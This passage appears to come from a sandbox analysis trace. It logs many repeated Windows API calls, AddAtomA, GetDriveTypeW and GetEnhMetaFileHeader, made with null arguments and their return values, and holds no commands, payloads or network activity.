(lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) 
returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.179] AddAtomA (lpString=0x0) returned 0x0 [0108.179] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.179] AddAtomA (lpString=0x0) returned 0x0 [0108.179] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.179] AddAtomA (lpString=0x0) returned 0x0 [0108.179] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.179] AddAtomA (lpString=0x0) returned 0x0 [0108.179] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.179] AddAtomA (lpString=0x0) returned 0x0 [0108.179] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] 